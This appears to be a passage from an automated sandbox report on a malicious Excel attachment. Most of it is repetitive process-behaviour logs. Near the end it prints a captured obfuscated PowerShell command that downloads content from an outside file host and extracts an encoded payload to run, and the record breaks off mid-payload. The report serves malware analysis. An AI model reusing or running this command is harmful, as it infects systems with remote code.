    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Pedido No 4500924462.xlsStream path 'Workbook' entropy: 7.99733421223 (max. 8.0)
    Source: 8A830000.0.drStream path 'Workbook' entropy: 7.99803585802 (max. 8.0)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1979Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2435Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2163Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3832Thread sleep time: -420000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4020Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3984Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4044Thread sleep count: 2435 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4044Thread sleep count: 2163 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2464Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1484Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_03570636 mov edx, dword ptr fs:[00000030h]9_2_03570636
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell download and execute
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTR
    Bypasses PowerShell execution policy
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSB